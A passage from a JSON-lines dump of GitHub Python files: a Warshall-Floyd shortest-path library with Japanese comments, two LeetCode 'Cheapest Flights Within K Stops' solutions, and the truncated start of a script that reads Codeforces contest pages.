","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_9/gvnser004/question2.py","file_name":"question2.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9979177315","text":"#title#\n# ワーシャルフロイド法\n#subtitle#\n# warshall_floyd: 全頂点間最短経路のリストを作る\n# O(N^3)\n\n#name#\n# ワーシャルフロイド法\n#discription#\n# 全頂点間最短路\n# d[i][j]は2頂点間i, j間の移動コストを格納, Mは頂点数\n# O(N^3)\n#body#\nimport copy\n\nclass warshall_floyd:\n def __init__(self, n:int) -> None:\n self.INF = float(\"inf\")\n self.n = n\n self.d = [[self.INF] * n for _ in range(n)]\n #d[u][v] : 辺uvのコスト(存在しないときはinf)\n for i in range(n):\n self.d[i][i] = 0 #自身のところに行くコストは0\n\n\n def build(self):\n n = self.n\n wf = copy.deepcopy(self.d)\n for k in range(n):\n for i in range(n):\n for j in range(n):\n wf[i][j] = min(wf[i][j], wf[i][k] + wf[k][j])\n self.wf = wf #wf[i][j]に頂点i, j間の最短距離を格納\n\n\n def add_edge(self, fm, to, cost):\n self.d[fm][to] = cost\n\n\n # 負値閉路検索\n @property\n def is_neg_cycle(self) -> bool:\n for i in range(self.n):\n if self.wf[i][i] < 0:\n return True\n return False\n\n\n # 経路復元\n def path(self, s, g):\n ret = []\n if s == g or self.wf[s][g] == self.INF:\n return ret\n cur = s\n while cur!=g:\n for nxt in range(self.n):\n if nxt==cur or nxt==s: continue\n if self.d[cur][nxt] + self.wf[nxt][g] == self.wf[cur][g]:\n ret.append((cur, nxt))\n # ret.append((nxt, cur))\n cur = nxt\n break\n return ret\n\n##############################\n\nn, m = map(int,input().split()) #N:頂点数 m:辺の数\n\nWF = warshall_floyd(n)\n\nfor _ in range(m):\n _u, _v, _w = map(int,input().split())\n _u -= 1; _v -= 1\n WF.add_edge(_u, _v, _w)\n WF.add_edge(_v, _u, _w)\n\nWF.build()\n\nprint(WF.path(0, n-1))\n\n#prefix#\n# Lib_SP_最短経路探索_warshall\n#end#\n","repo_name":"ibtosmlin/atcoder","sub_path":"lib/lib/Lib_SP_ワーシャルフロイド.py","file_name":"Lib_SP_ワーシャルフロイド.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14031880200","text":"'''\n\n 787. Cheapest Flights Within K Stops\n\n'''\n\nfrom collections import defaultdict\nimport heapq\n\n\nclass SolutionRef:\n def findCheapestPrice(self, n, flights, src, dst, k):\n prices = [float('inf')] * n\n prices[src] = 0\n \n for i in range(k + 1):\n tempPrices = prices.copy()\n \n for s, d, p in flights: # source, destination, price\n if prices[s] == float('inf'): \n continue\n if prices[s] + p < tempPrices[d]:\n tempPrices[d] = prices[s] + p\n \n prices = tempPrices\n \n return -1 if prices[dst] == float('inf') else prices[dst]\n\n\n\n\nclass Solution:\n def findCheapestPrice(self, n, flights, src, dst, k):\n prices = [float('inf')] * n\n prices[src] = 0\n \n for _ in range(k + 1):\n temp = prices.copy()\n \n for fr, to, cost in flights:\n if flights[fr] == float('inf'): continue\n temp[to] = min(temp[to], prices[fr] + cost)\n \n prices = temp\n \n return prices[dst] if prices[dst] != float('inf') else -1\n\n \n \ndef runSolution():\n solution = Solution()\n \n print(solution.findCheapestPrice(\n n = 4, flights = [[0,1,100],[1,2,100],[2,0,100],[1,3,600],[2,3,200]], src = 0, dst = 3, k = 1))\n print(solution.findCheapestPrice(\n n = 3, flights = [[0,1,100],[1,2,100],[0,2,500]], src = 0, dst = 2, k = 1))\n pass\nrunSolution()","repo_name":"AlexanderDLe/Python_DataStructuresAndAlgorithms","sub_path":"Graph/CheapestFlightsWithinKStops.py","file_name":"CheapestFlightsWithinKStops.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28511332377","text":"import requests, json\nimport os\n\ndef get_contest_name(url):\n while True: \n page = requests.get(url).text\n pos = page.find('content=\"Dashboard - ')\n if pos == -1:\n print('Please wait until the contest starts ...', end = '\\r')\n else:\n break\n \n pos += len('content=\"Dashboard - ')\n ans = page[pos:page.find(' - Codeforces', pos)]\n return ans\n\ndef get_problems_list(url):\n page = requests.get(url).text\n ans = []\n page = page[page.find('generalAnnouncement'):]\n while True:\n nxt = page.find('